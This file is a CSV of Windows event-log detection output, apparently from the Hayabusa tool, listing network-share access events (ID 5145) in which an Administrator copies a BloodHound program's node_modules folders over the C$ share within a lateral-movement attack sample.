2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
